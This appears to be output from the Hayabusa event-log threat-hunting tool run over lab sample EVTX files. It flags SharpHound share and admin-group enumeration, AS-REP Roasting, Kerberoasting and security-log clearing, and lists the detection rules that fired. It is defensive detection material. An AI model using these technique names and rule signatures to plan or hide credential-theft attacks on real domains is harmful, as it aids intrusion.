Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : 
Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 
16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge 
Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket 
Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-03 17:16:43.008 
+09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 
62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 
3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission 
Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 
0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
